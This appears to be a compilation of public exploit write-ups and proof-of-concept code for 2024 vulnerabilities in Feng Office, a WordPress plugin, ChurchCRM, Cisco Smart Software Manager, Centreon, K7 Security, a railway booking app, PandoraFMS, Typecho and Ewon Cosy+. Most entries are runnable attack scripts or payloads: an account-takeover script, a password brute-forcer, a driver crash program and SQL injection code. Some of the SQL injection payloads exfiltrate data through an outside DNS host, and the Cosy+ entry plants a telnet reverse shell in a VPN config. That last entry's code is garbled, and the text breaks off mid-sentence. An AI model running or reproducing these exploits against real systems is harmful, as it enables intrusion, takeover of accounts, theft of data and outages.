Cookie: REMEMBERME=App.Entity.User:dXNlcg~~:1722991344:s-spusttpMsLQb2wlzMc2GJcKATcKhGTfj1VuV8GOFA~dRl86I12JAEzbjfmLzxK4ps0tMcX9WH15-DfzD115EE~;
PHPSESSID=fhp06bc4sc5i8p4fk5bt9petii; sidebar-toggled=false
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=1
property[city]=3&property[district]=&property[neighborhood]=3&property[metro_station]=&property[dealType]=1&property[category]=1&property[bathrooms_number]=&property[bedrooms_number]=2&property[max_guests]=6&property[property_description][title]=Furnished
renovated 2-bedroom 2-bathroom
flat&property[property_description][meta_title]=&property[property_description][meta_description]=Furnished
renovated 2-bedroom 2-bathroom flat&property[address]=5411 Bayshore
Blvd, Tampa, FL
33611&property[latitude]=27.885095&property[longitude]=-82.486153&property[show_map]=1&property[price]=2200&property[price_type]=mo&property[features][]=1&property[features][]=2&property[features][]=4&property[features][]=6&property[features][]=8&property[property_description][content]=<img
src="x" onerror="alert(document.domain)">&files=&property[_token]=09e8a0ac823.ahexkItiSa6gSwce8RFyNpn94Uqu9g1cc4CN6g-zLsE.PSHrpu87DJzVcjJ1smI1c8-VrjjGuHUGMefsg3XWdJcuL9_F2Cc_ncMsSg
# Exploit Title: Feng Office 3.11.1.2 - SQL Injection
# Date: 7/2024
# Exploit Author: Andrey Stoykov
# Version: 3.11.1.2
# Tested on: Ubuntu 22.04
# Blog: http://msecureltd.blogspot.com
SQL Injection:
1. Login to application
2. Click on "Workspaces"
3. Copy full URL
4. Paste the HTTP GET request into text file
5. Set the injection point to be in the "dim" parameter value
6. Use SQLMap to automate the process
sqlmap -r request.txt --threads 1 --level 5 --risk 3 --dbms=3Dmysql -p dim =
--fingerprint
[...]
[12:13:03] [INFO] confirming MySQL
[12:13:04] [INFO] the back-end DBMS is MySQL
[12:13:04] [INFO] actively fingerprinting MySQL
[12:13:05] [INFO] executing MySQL comment injection fingerprint
web application technology: Apache
back-end DBMS: active fingerprint: MySQL >=3D 5.7
comment injection fingerprint: MySQL 5.7.37
[...]
# Exploit Title: PZ Frontend Manager WordPress Plugin 1.0.5 - Cross Site Request Forgery (CSRF)
# Date: 2024-07-01
# Exploit Author: Vuln Seeker Cybersecurity Team
# Vendor Homepage: https://wordpress.org/plugins/pz-frontend-manager/
# Version: <= 1.0.5
# Tested on: Firefox
# Contact me: vulns@vulnseeker.org
The plugin does not have CSRF checks in some places, which could allow
attackers to make logged in users perform unwanted actions via CSRF attacks.
Proof of concept:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost:10003
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0)
Gecko/20100101 Firefox/124.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 1093
Origin: http://localhost:10003
Sec-GPC: 1
Connection: close
Cookie: Cookie
action=pzfm_upload_avatar&imageData=data%3Aimage%2Fpng%3Bbase64%2CiVBORw0KGgoAAAANSUhEUgAAADcAAAA3CAAAAACNsI2aAAAACXBIWXMAAAB5AAAAeQBPsriEAAAB6ElEQVR42rVWO46EMAzNadAcY3vaOQMXoXcXKZehS8NpqNxamw8JxDYra1Zjhgge9jhx%2FBy7bYvtl4Y8Qn%2BtEjty6WxuQ0KkfOM5wJEeEkT1bsigU%2BxGQV%2BQfZ2ned0LAkLnyQ4XV2XB%2Fk%2BjXdTs8Mc1%2BUlvQehEt5Fit7hLFsUfqfOk3d1lJ9VO%2BqN1sFvJm%2BIScB7s3uo8ZVzC8RrsXjIuqp2n0d%2BsxFNbHxCw9cF34yn2L5jyJWndIprzRfqLpvw0%2B6PCh1fjgxpP5NL4VzlYEa6zOYDgzyvk0cMbykMek6THipSXAD5%2FBKh8H%2F3JGZTxPgM9Px9WDL0CkM1ORJie48nsWAXQ8kW1YxlknKfIWJs%2FEBXgoZ6Jf2KMNMYz4FgBJjTGkxR%2FH67vm%2FH8eP9ShlyRqfli24c0svy0zLNXgOkNtQJEle%2FP%2FMPOv8T3TGZIZIbO7sL7BMON74nkuQqUj4XvnMvwiNCBjO%2Byev2NVDtZLeX5rvD9lu0zauxW%2Ba6dBvJ8H5Gyfzz3wIBkO57rYECyHeeWF%2BxW%2BYcT47Jkdzi4TpT%2BlPNdIv9Z34fxNOxf0PhO91yw5MuMen56AxLPOtG7W9T63SCQ2k9Uol1so3bVnrog2JTyU57n1bb37n3s5s8Of5RfsaTdSlfuyUAAAAA8dEVYdGNvbW1lbnQAIEltYWdlIGdlbmVyYXRlZCBieSBHTlUgR2hvc3RzY3JpcHQgKGRldmljZT1wbm1yYXcpCvqLFvMAAABKdEVYdHNpZ25hdHVyZQA4NWUxYWU0YTJmYmE3OGVlZDRmZDhmMGFjZjIzNzYwOWU4NGY1NDk2Y2RlMjBiNWQ3NmM5Y2JjMjk4YzRhZWJjJecJ2gAAAABJRU5ErkJggg%3D%3D&userID=1
CSRF Exploit:
<html>
<body>
<form action="http://localhost:10003/wp-admin/admin-ajax.php"
method="POST">
<input type="hidden" name="action" value="pzfm_upload_avatar" />
<input type="hidden" name="imageData"
value="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADcAAAA3CAAAAACNsI2aAAAACXBIWXMAAAB5AAAAeQBPsriEAAAB6ElEQVR42rVWO46EMAzNadAcY3vaOQMXoXcXKZehS8NpqNxamw8JxDYra1Zjhgge9jhx/By7bYvtl4Y8Qn+tEjty6WxuQ0KkfOM5wJEeEkT1bsigU+xGQV+QfZ2ned0LAkLnyQ4XV2XB/k+jXdTs8Mc1+UlvQehEt5Fit7hLFsUfqfOk3d1lJ9VO+qN1sFvJm+IScB7s3uo8ZVzC8RrsXjIuqp2n0d+sxFNbHxCw9cF34yn2L5jyJWndIprzRfqLpvw0+6PCh1fjgxpP5NL4VzlYEa6zOYDgzyvk0cMbykMek6THipSXAD5/BKh8H/3JGZTxPgM9Px9WDL0CkM1ORJie48nsWAXQ8kW1YxlknKfIWJs/EBXgoZ6Jf2KMNMYz4FgBJjTGkxR/H67vm/H8eP9ShlyRqfli24c0svy0zLNXgOkNtQJEle/P/MPOv8T3TGZIZIbO7sL7BMON74nkuQqUj4XvnMvwiNCBjO+yev2NVDtZLeX5rvD9lu0zauxW+a6dBvJ8H5Gyfzz3wIBkO57rYECyHeeWF+xW+YcT47Jkdzi4TpT+lPNdIv9Z34fxNOxf0PhO91yw5MuMen56AxLPOtG7W9T63SCQ2k9Uol1so3bVnrog2JTyU57n1bb37n3s5s8Of5RfsaTdSlfuyUAAAAA8dEVYdGNvbW1lbnQAIEltYWdlIGdlbmVyYXRlZCBieSBHTlUgR2hvc3RzY3JpcHQgKGRldmljZT1wbm1yYXcpCvqLFvMAAABKdEVYdHNpZ25hdHVyZQA4NWUxYWU0YTJmYmE3OGVlZDRmZDhmMGFjZjIzNzYwOWU4NGY1NDk2Y2RlMjBiNWQ3NmM5Y2JjMjk4YzRhZWJjJecJ2gAAAABJRU5ErkJggg=="
/>
<input type="hidden" name="userID" value="1"" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
Profile picture of user 1 will be changed in the dashboard
http://localhost:10003/dashboard/?dashboard=profile
Reference:
https://wpscan.com/vulnerability/73ba55a5-6cff-40fc-9686-30c50f060732/
# Exploit Title: ChurchCRM 5.9.1 - SQL Injection
# Author: Sanan Qasimzada
# Date: 06.07.2024
# Vendor: http://churchcrm.io/
# Software: https://github.com/ChurchRM/CRM
# Reference: https://portswigger.net/web-security/sql-injection
# Description:
In the manual insertion point 1 - parameter `EID` appears to be
vulnerable to SQL injection attacks.
No need for cookies, no need admin authentication and etc.
The attacker easily can steal information from this system by using
this vulnerability.
STATUS: HIGH Vulnerability - CRITICAL
[+]Payload:
```mysql
---
Parameter: EID (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: EID=(select
load_file('\\\\l4qwtfn9ngsxicbtklv0x1e1rsxllb92bq2gp6dv.smotaniak.com
\\ior'))
OR NOT 2407=2407
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: EID=(select
load_file('\\\\l4qwtfn9ngsxicbtklv0x1e1rsxllb92bq2gp6dv.smotaniak.com
\\ior'))
AND (SELECT 9547 FROM (SELECT(SLEEP(3)))QEvX)
Type: UNION query
Title: MySQL UNION query (UTF8) - 11 columns
Payload: EID=(select
load_file('\\\\l4qwtfn9ngsxicbtklv0x1e1rsxllb92bq2gp6dv.smotaniak.com
\\ior'))
UNION ALL SELECT
'UTF8','UTF8',CONCAT(0x716a6b7a71,0x57646e6842556a56796a75716b504b4d6941786f7578696a4c557449796d76425645505670694b42,0x717a7a7871),'UTF8','UTF8','UTF8','UTF8','UTF8','UTF8','UTF8','UTF8','UTF8','UTF8'#
---
```
# Reproduce:
[href](
https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/ChurchCRM/2023/ChurchCRM-4.5.3-121fcc1
)
# Proof and Exploit:
[href](https://streamable.com/1eqhw2)
# Time spend:
01:00:00
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at
https://packetstormsecurity.com/https://cve.mitre.org/index.html and
https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
# Exploit Title: Cisco Smart Software Manager On-Prem 8-202206 - Account Takeover
# Google Dork: N/A
# Date: 21/07/2024
# Exploit Author: Mohammed Adel
# Vendor Homepage: https://www.cisco.com
# Software Link:
https://www.cisco.com/c/en/us/products/collateral/cloud-systems-management/smart-software-manager-satellite/datasheet-c78-734539.html
# Version: 8-202206 and earlier
# Tested on: Kali Linux
# CVE : CVE-2024-20419
# Security Advisory:
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cssm-auth-sLw3uhUy
# Technical Analysis: https://www.0xpolar.com/blog/CVE-2024-20419
import requests, sys
from urllib.parse import unquote
# Suppress SSL warnings
requests.packages.urllib3.disable_warnings()
Domain = sys.argv[1] # Domain, https://0xpolar.com:8443
Username = sys.argv[2] # Username, by default its [admin]
password = "Polar@123456780"
print("[*] Cisco Smart Software Manager On-Prem")
print("[*] Account Takeover Exploit")
print("[*] Target: "+Domain)
print("[*] Username: "+Username)
print("\n")
print("[*] Getting Necessary Tokens..")
get_url = Domain+"/backend/settings/oauth_adfs?hostname=polar"
response = requests.get(get_url, verify=False)
def get_cookie_value(headers, cookie_name):
cookies = headers.get('Set-Cookie', '').split(',')
for cookie in cookies:
if cookie_name in cookie:
parts = cookie.split(';')
for part in parts:
if cookie_name in part:
return part.split('=')[1].strip()
return None
set_cookie_headers = response.headers.get('Set-Cookie', '')
xsrf_token = get_cookie_value(response.headers, 'XSRF-TOKEN')
lic_engine_session = get_cookie_value(response.headers, '_lic_engine_session')
if xsrf_token:
xsrf_token = unquote(xsrf_token)
if not lic_engine_session or not xsrf_token:
print("Required cookies not found in the response.")
else:
print("[+] lic_engine_session: "+lic_engine_session)
print("[+] xsrf_token: "+xsrf_token)
print("\n[*] Generating Auth Token")
post_url = Domain+"/backend/reset_password/generate_code"
headers = {
'Accept': 'application/json',
'Content-Type': 'application/json',
'X-Xsrf-Token': xsrf_token,
'Sec-Ch-Ua': '',
'Sec-Ch-Ua-Mobile': '?0',
}
cookies = {
'_lic_engine_session': lic_engine_session,
'XSRF-TOKEN': xsrf_token,
}
payload = {
'uid': Username
}
post_response = requests.post(post_url, headers=headers, cookies=cookies, json=payload, verify=False)
post_response_json = post_response.json()
auth_token = post_response_json.get('auth_token')
if not auth_token:
print("auth_token not found in the response.")
else:
print("[+] Auth Token: "+auth_token)
print("\n[*] Setting Up a New Password")
final_post_url = Domain+"/backend/reset_password"
final_headers = {
'Accept': 'application/json',
'Content-Type': 'application/json',
'X-Xsrf-Token': xsrf_token,
}
final_cookies = {
'_lic_engine_session': lic_engine_session,
'XSRF-TOKEN': xsrf_token,
}
final_payload = {
'uid': Username,
'auth_token': auth_token,
'password': password,
'password_confirmation': password,
'common_name': ''
}
final_post_response = requests.post(final_post_url, headers=final_headers, cookies=final_cookies, json=final_payload, verify=False)
response_text = final_post_response.text
if "OK" in response_text:
print("[+] Password Successfully Changed!")
print("[+] Username: "+Username)
print("[+] New Password: "+password)
else:
print("[!] Something Went Wrong")
print(response_text)
# Exploit Title : Centron 19.04 - Remote Code Execution (RCE)
# Tested on Centreon API 19.04.0
# Centreon 19.04 - Login Password Bruteforcer
# Written on 6 Nov 2019
# Referencing API Authentication of the Centreon API document
# Author: st4rry
# centbruteon.py
# Centreon Download Link: https://download.centreon.com/#version-Older
# Dependencies: sys, requests, argparse, termcolor, os
#!/usr/bin/env python3
import sys
import requests
import argparse
from termcolor import colored
import os
def main():
parser = argparse.ArgumentParser()
parser.add_argument('-u', dest='host', help='Define your target URL', required=True)
parser.add_argument('-p', dest='port', type=int, help='Specify port number', default=80)
parser.add_argument('--https', dest='https', action='store_true', help='Use HTTPS instead of HTTP')
parser.add_argument('-l', dest='username', help='Specific username')
parser.add_argument('-L', dest='userfile', type=argparse.FileType('r'), help='Username wordlist')
parser.add_argument('-w', dest='passwfile', type=argparse.FileType('r'), help='Specify Password wordlist', required=True)
parser.add_argument('--insecure', action='store_true', help='Skip SSL certificate verification')
parser.add_argument('--ca-bundle', dest='ca_bundle', help='Path to custom CA bundle')
if len(sys.argv) == 1:
parser.print_help(sys.stderr)
sys.exit(1)
args = parser.parse_args()
protocol = 'https' if args.https else 'http'
server = f"{protocol}://{args.host}:{args.port}"
user = args.username
passfile = args.passwfile.read().splitlines()
userfile = args.userfile
dirlo = '/centreon/api/index.php?action=authenticate'
verify_ssl = not args.insecure
if args.ca_bundle:
verify_ssl = args.ca_bundle
if user:
brute_force_single_user(server, user, passfile, dirlo, verify_ssl)
elif userfile:
usrwl = userfile.read().splitlines()
brute_force_multiple_users(server, usrwl, passfile, dirlo, verify_ssl)
else:
print(colored('Something went wrong!', 'red'))
sys.exit(1)
def brute_force_single_user(server, user, passfile, dirlo, verify_ssl):
for password in passfile:
data = {'username': user, 'password': password}
r = requests.post(f'{server}{dirlo}', data=data, verify=verify_ssl)
try:
print('Processing...')
print(colored('Brute forcing on Server: ', 'yellow') + colored(server, 'yellow') +
colored(' Username: ', 'yellow') + colored(user, 'yellow') +
colored(' Password: ', 'yellow') + colored(password, 'yellow'))
if r.status_code == 200:
print(colored('Credentials found: username: ', 'green') + colored(user, 'green') +
colored(' password: ', 'green') + colored(password, 'green') +
colored(' server: ', 'green') + colored(server, 'green'))
print(colored('Token: ', 'cyan') + colored(r.content.decode(), 'cyan'))
print('\n')
break
else:
print(colored('403 - Unauthenticated!', 'red'))
except IndexError:
print(colored('Something went wrong', 'red'))
def brute_force_multiple_users(server, usrwl, passfile, dirlo, verify_ssl):
for usr in usrwl:
for password in passfile:
data = {'username': usr, 'password': password}
r = requests.post(f'{server}{dirlo}', data=data, verify=verify_ssl)
try:
print('Processing...')
print(colored('Brute forcing on Server: ', 'yellow') + colored(server, 'yellow') +
colored(' Username: ', 'yellow') + colored(usr, 'yellow') +
colored(' Password: ', 'yellow') + colored(password, 'yellow'))
if r.status_code == 200:
print(colored('Credentials found: username: ', 'green') + colored(usr, 'green') +
colored(' password: ', 'green') + colored(password, 'green') +
colored(' server: ', 'green') + colored(server, 'green'))
print(colored('Token: ', 'cyan') + colored(r.content.decode(), 'cyan'))
print('\n')
else:
print(colored('403 - Unauthenticated!', 'red'))
except IndexError:
print(colored('Something went wrong', 'red'))
if __name__ == '__main__':
main()
# Exploit Title: K7 Ultimate Security K7RKScan.sys 17.0.2019 - Denial Of Service (DoS)
# Date: 13.08.2024
# Author: M. Akil Gündoğan
# Vendor Homepage: https://k7computing.com/
# Version: < v17.0.2019
# Tested on: Windows 10 Pro x64
# CVE ID: CVE-2024-36424
# Vulnerability Description:
--------------------------------------
In K7 Ultimate Security < v17.0.2019, the driver file (K7RKScan.sys - this version 15.1.0.7) allows local users to cause a denial of service (BSOD) or possibly have unspecified other impact because of null pointer dereference from IOCtl 0x222010 and 0x222014. At the same time, the drive is accessible to all users in the "Everyone" group.
# Technical details and step by step Proof of Concept's (PoC):
--------------------------------------
1 - Install the driver in the path "C:\Program Files (x86)\K7 Computing\K7TSecurity\K7TSecurity\64Bit\K7RKScan.sys" to the system via OSRLoader or sc create.
2 - Compile the attached PoC code written in C++ as release on VS 2022.
3 - Run the compiled PoC directly with a double click. You will see the system crash/BSOD.
# Impact:
--------------------------------------
An attacker with unauthorized user access can cause the entire system to crash and terminate critical processes, including any antivirus process where the relevant driver is activated and used on the system.
# Advisories:
--------------------------------------
K7 Computing recommends that all customers update their products to the corresponding versions shown below:
K7 Ultimate Security (17.0.2019 or Higher)
# Timeline:
--------------------------------------
- 16.05.2024 - Vulnerability reported.
- 05.08.2024 - Vendor has fixed the vulnerability.
- 13.08.2024 - Released.
# References:
--------------------------------------
- Vendor: https://www.k7computing.com
- Advisory: https://support.k7computing.com/index.php?/selfhelp/view-article/Advisory-issued-on-5th-aug-2024-417
- CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-36424
- Repository: https://github.com/secunnix/CVE-2024-36424
# PoC Code (C++):
-------------------------------------------------------------------------------------------------------------------------
/*
# Usage: Only compile it and run, boooom :)
*/
#include <windows.h>
#include <iostream>
const std::wstring driverDevice = L"\\\\.\\DosK7RKScnDrv"; // K7RKScan.sys symbolic link path
const DWORD ioCTL = 0x222010; // IOCTL 0x222010 or 0x222014
int main() {
std::cout << "K7 Ultimae Security < v17.0.2019 K7RKScan.sys Null Pointer Dereference - PoC" << std::endl;
HANDLE hDevice = CreateFile(driverDevice.c_str(),
GENERIC_READ | GENERIC_WRITE,
0,
nullptr,
OPEN_EXISTING,
0,
nullptr);
if (hDevice == INVALID_HANDLE_VALUE) {
std::cerr << "Failed, please load driver and check again. Exit... " << GetLastError() << std::endl;
return 1;
}
void* inputBuffer = nullptr; // Null input buffer
DWORD inputBufferSize = 0;
DWORD bytesReturned;
BOOL result = DeviceIoControl(hDevice,
ioCTL,
inputBuffer,
inputBufferSize,
nullptr,
0,
&bytesReturned,
nullptr);
if (!result) {
std::cerr << "DeviceIoControl failed. Exit... " << GetLastError() << std::endl;
}
CloseHandle(hDevice);
return 0;
}
# Exploit Title: CodeAstro Online Railway Reservation System 1.0 - Cross Site Scripting (XSS)
# Date: 2024-08-15
# Exploit Author: Raj Nandi
# Vendor Homepage: https://codeastro.com/
# Software Link:
https://codeastro.com/online-railway-reservation-system-in-php-with-source-code/
# Version: 1.0
# Tested on: Any OS
# CVE: CVE-2024-7815
## Description:
A Cross-Site Scripting (XSS) vulnerability exists in [Application
Name/Version]. This vulnerability allows an attacker to inject and execute
arbitrary JavaScript code within the context of the user's browser session.
## Proof of Concept (PoC):
1. Navigate to [vulnerable page or input field].
2. Input the following payload: `<script>alert(document.cookie)</script>`
3. Upon execution, the script will trigger and display the user's cookies
in an alert box.
## Mitigation:
To prevent this vulnerability, ensure that all user inputs are properly
sanitized and validated before being reflected back on the webpage.
# Exploit Title: PandoraFMS 7.0NG.772 - SQL Injection
# Date: 21/11/2023
# Exploit Author: Osama Yousef
# Vendor Homepage: https://pandorafms.com/
# Software Link: https://github.com/pandorafms/pandorafms/releases/download/v772-LTS/pandorafms_agent_linux-7.0NG.772.tar.gz
# Version: v7.0NG.772
# Tested on: Linux
# CVE : CVE-2023-44088
import re, requests, argparse, string, random, base64
import urllib3
import html
headers = {
'Cache-Control': 'max-age=0',
'Origin': '',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36',
'Accept': '*/*',
'Referer': ''
}
def login(session, url, username, password):
res = session.get(url)
csrf = retrieve_csrftoken(res.text)
url+= '?login=1'
payload = "nick={}&pass={}&login_button=Let%27s+go&csrf_code={}"
res = session.post(url, data=payload.format(username, password, csrf), headers={'Content-Type': 'application/x-www-form-urlencoded'})
if 'User is blocked' in res.text:
print("Login Failed!")
exit(1)
def exploit(session, url, imagepath, query):
url1 = url + "?sec=network&sec2=godmode/reporting/visual_console_builder&tab=data"
name = random_id(10)
payload = "{}.jpg',({}),'1','1','1','1');-- helloo.jpg".format(name, query)
payload=payload.replace(' ', '\t')
files = {"background_image": (payload, open(imagepath, 'rb').read(), 'image/jpeg')}
# Create a reference to the original _make_request method
urllib3.connectionpool.HTTPConnectionPool._original_make_request = urllib3.connectionpool.HTTPConnectionPool._make_request
# Replace the _make_request method with the custom_make_request function
urllib3.connectionpool.HTTPConnectionPool._make_request = custom_make_request
res = session.post(url1, files=files, data={'action':'save', 'name':name, 'id_group': 0, 'background_image': 'None.png', 'background_color': '#ffffff', 'width': '1024', 'height': '768', 'is_favourite_sent': '0', 'auto_adjust_sent': '0', 'update_layout': 'Save'})
if 'Created successfully' not in res.text:
print("Failed to create a visual console!")
exit(1)
url2 = url + "?sec=godmode/reporting/map_builder&sec2=godmode/reporting/map_builder"
res = session.get(url2)
x = re.search('(?:<a href=".*">)'+name, res.text)
match = x.group()
url3 = match.lstrip("<a href=")
url3 = url3.split('"')[1]
url3 = url3.split("?")[1]
url3 = html.unescape(url3)
url4 = url+ "?" + url3
res = session.get(url4)
x = re.search('(?:var props = {"autoAdjust":true,"backgroundColor":".*","backgroundImage")', res.text)
match = x.group()
output = match.lstrip('var props = {"autoAdjust":true,"backgroundColor":"')
output = output.split('","backgroundImage')[0]
print("Query output: {}".format(output))
def retrieve_csrftoken(response):
x = re.search('(?:<input id="hidden-csrf_code" name="csrf_code" type="hidden" value=")[a-zA-Z0-9]*(?:")', response)
match = x.group()
csrf = match.lstrip('<input id="hidden-csrf_code" name="csrf_code" type="hidden" value="').rstrip('"')
print("CSRF: {}".format(csrf))
return csrf
def random_id(len):
chars = string.ascii_uppercase + string.ascii_lowercase + string.digits
return ''.join(random.choice(chars) for _ in range(len))
def custom_make_request(self, conn, method, url, timeout=urllib3.connectionpool._Default, chunked=False, **httplib_request_kw):
body = httplib_request_kw['body']
if body:
body = body.replace(b"%09", b"\t"*3)
httplib_request_kw['body'] = body
return self._original_make_request(conn, method, url, timeout=timeout, chunked=chunked, **httplib_request_kw)
def main():
ap = argparse.ArgumentParser()
ap.add_argument("-t", "--target", required=True, help="Target URI")
ap.add_argument("-u", "--username", required=True, help="Username")
ap.add_argument("-p", "--password", required=True, help="Password")
ap.add_argument("-i", "--image", required=True, help="Image path")
ap.add_argument("-q", "--query", required=True, help="SQL Query to execute")
ap.add_argument("-x", "--proxy", required=False, help="Proxy Configuration (e.g., http://127.0.0.1:8080/)")
args = vars(ap.parse_args())
session = requests.Session()
url = args['target']
if 'pandora_console' not in url:
if not url.endswith('/'):
url += '/'
url += 'pandora_console/'
headers['Origin'] = args['target']
headers['Referer'] = args['target']
session.headers.update(headers)
proxies = {}
if args['proxy'] is not None:
if 'https' in args['proxy']:
proxies['https'] = args['proxy']
else:
proxies['http'] = args['proxy']
session.proxies.update(proxies)
login(session, url, args['username'], args['password'])
exploit(session, url, args['image'], args['query'])
if __name__=='__main__':
main()
# Exploit Title: Typecho 1.3.0 - Race Condition
# Google Dork: intext:"Powered by Typecho" inurl:/index.php
# Date: 18/08/2024
# Exploit Author: Michele 'cyberaz0r' Di Bonaventura
# Vendor Homepage: https://typecho.org
# Software Link: https://github.com/typecho/typecho
# Version: 1.3.0
# Tested on: Typecho 1.3.0 Docker Image with PHP 7.4 (https://hub.docker.com/r/joyqi/typecho)
# CVE: CVE-2024-35539
# For more information, visit the blog post: https://cyberaz0r.info/2024/08/typecho-multiple-vulnerabilities/
package main
import (
"bytes"
"fmt"
"io"
"net/http"
"net/url"
"os"
"strings"
"sync"
"sync/atomic"
"time"
"github.com/robertkrimen/otto"
)
var (
c int32 = 0
commentsPostInterval int64 = 60
maxThreads int = 1000
wg sync.WaitGroup
userAgent string = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
client *http.Client = &http.Client{
CheckRedirect: func(req *http.Request, via []*http.Request) error {
return http.ErrUseLastResponse
},
}
)
func getJSFunction(u string) string {
req, err := http.NewRequest("GET", u, nil)
if err != nil {
fmt.Println("[X] Error creating initial request:", err)
return ""
}
req.Header.Set("User-Agent", userAgent)
resp, err := client.Do(req)
if err != nil {
fmt.Println("[X] Error sending initial request:", err)
return ""
}
buf := new(bytes.Buffer)
buf.ReadFrom(resp.Body)
body := buf.String()
if !strings.Contains(body, "input.value = (") || !strings.Contains(body, ")();;") {
fmt.Println("[X] Error finding JavaScript function")
return ""
}
jsFunction := strings.Split(body, "input.value = (")[1]
jsFunction = strings.Split(jsFunction, ")();;")[0]
return jsFunction
}
func executeJavaScript(jsFunctionName string, jsFunctionBody string) string {
vm := otto.New()
_, err := vm.Run(jsFunctionBody)
if err != nil {
fmt.Println("[X] Error executing JavaScript function:", err)
return ""
}
result, err := vm.Call(jsFunctionName, nil)
if err != nil {
fmt.Println("[X] Error calling JavaScript function:", err)
return ""
}
returnValue, err := result.ToString()
if err != nil {
fmt.Println("[X] Error converting JavaScript result to string:", err)
return ""
}
return returnValue
}
func spamComments(u string, formToken string) {
timestamp := time.Now().Unix()
for {
i := 0
for time.Now().Unix() < timestamp-1 {
time.Sleep(250 * time.Millisecond)
fmt.Printf("\r[*] Waiting for next spam wave... (%d seconds) ", timestamp-time.Now().Unix()-1)
}
fmt.Printf("\n")
for time.Now().Unix() < timestamp+2 {
if i < maxThreads {
wg.Add(1)
go spamRequest(u, formToken, i)
i++
}
}
wg.Wait()
fmt.Printf("\n[+] Successfully spammed %d comments\n", c)
timestamp = time.Now().Unix() + commentsPostInterval
}
}
func spamRequest(u string, formToken string, i int) {
fmt.Printf("\r[*] Spamming comment request %d ", i)
defer wg.Done()
formData := url.Values{}
formData.Set("_", formToken)
formData.Set("author", fmt.Sprintf("user_%d", i))
formData.Set("mail", fmt.Sprintf("user%d@test.example", i))
formData.Set("text", fmt.Sprintf("Hello from user_%d", i))
req, err := http.NewRequest("POST", u+"comment", nil)
if err != nil {
return
}
req.Header.Set("Referer", u)
req.Header.Set("User-Agent", userAgent)
req.Header.Set("Content-Type", "application/x-www-form-urlencoded")
req.Header.Set("Content-Length", fmt.Sprint(len(formData.Encode())))
req.Body = io.NopCloser(strings.NewReader(formData.Encode()))
resp, err := client.Do(req)
if err != nil {
return
}
if resp.StatusCode == 302 {
atomic.AddInt32(&c, 1)
}
defer resp.Body.Close()
}
func main() {
if len(os.Args) != 2 {
fmt.Println("Usage: go run CVE-2024-35538.go <POST_URL>")
return
}
fmt.Println("[+] Starting Typecho <= 1.3.0 Race Condition exploit (CVE-2024-35539) by cyberaz0r")
targetUrl := os.Args[1]
fmt.Println("[+] Spam target:", targetUrl)
fmt.Println("[*] Getting JavaScript function to calculate form token...")
jsFunction := getJSFunction(targetUrl)
if jsFunction == "" {
fmt.Println("[-] Could not get JavaScript function, exiting...")
return
}
fmt.Println("[*] Evaluating JavaScript function to calculate form token...")
formToken := executeJavaScript("calculateToken", strings.Replace(jsFunction, "function ()", "function calculateToken()", 1))
if formToken == "" {
fmt.Println("[-] Could not get form token, exiting...")
return
}
fmt.Printf("[+] Form token: %s", formToken)
spamComments(targetUrl, formToken)
}
# Exploit Title: Cosy+ firmware 21.2s7 - Command Injection
# Google Dork: N/A
# Date: 2024-8-20
# Exploit Author: CodeB0ss
# Contact: t.me/codeb0ss / uncodeboss@gmail.com
# Version: 21.2s7
# Tested on: Windows 11 Home Edition
# CVE: CVE-2024-33896
import socket
import subprocess
import time
def configcreator(file_path):
with open(file_path, 'w') as f: f.write( """ client dev tun persist-tun
proto tcp verb 5 mute 20 --up '/bin/sh -c "TF=$(mktemp -u);mkfifo
$TF;telnet {attacker_ip} 5000 0<$TF | sh 1>$TF"' script-security 2 """) def
l3st(port): server_socket = socket.socket(socket.AF_INET,
socket.SOCK_STREAM) server_socket.bind(('0.0.0.0', port))
server_socket.listen(1) print(f" - --> Listening_0n_port {port}")
client_socket, _ = server_socket.accept() print(" - --> Recevied") while
True: data = client_socket.recv(1024) if not data: break
print(data.decode()) client_socket.close() server_socket.close() if name ==
"main": IP = '127.0.0.1' config = '/path/to/malicious_config.ovpn' port =
5000 listener_process = subprocess.Popen(['python', '-c', f'from main
import start_listener; start_listener({port})']) time.sleep(2)
create_malicious_openvpn_config(config) print(f" - --> config_created
{config}")
GitHub:
https://github.com/codeb0ss/CVE-2024-33896-PoC
Hey,
Overview: The Ewon Cosy+ is a VPN gateway used for remote access and
maintenance in industrial environments. The manufacturer describes the
product as follows (see [1]): "The Ewon Cosy+ gateway establishes a secure
VPN connection between the machine (PLC, HMI, or other devices) and the
remote engineer. The connection happens through Talk2m, a highly secured
industrial cloud service. The Ewon Cosy+ makes industrial remote access
easy and secure like never before!" Due to improper neutralization of
parameters read from a user-controlled configuration file, an authenticated
attacker is able to inject and execute OS commands on the device.
Vulnerability Details: Authenticated attackers are able to upload a custom
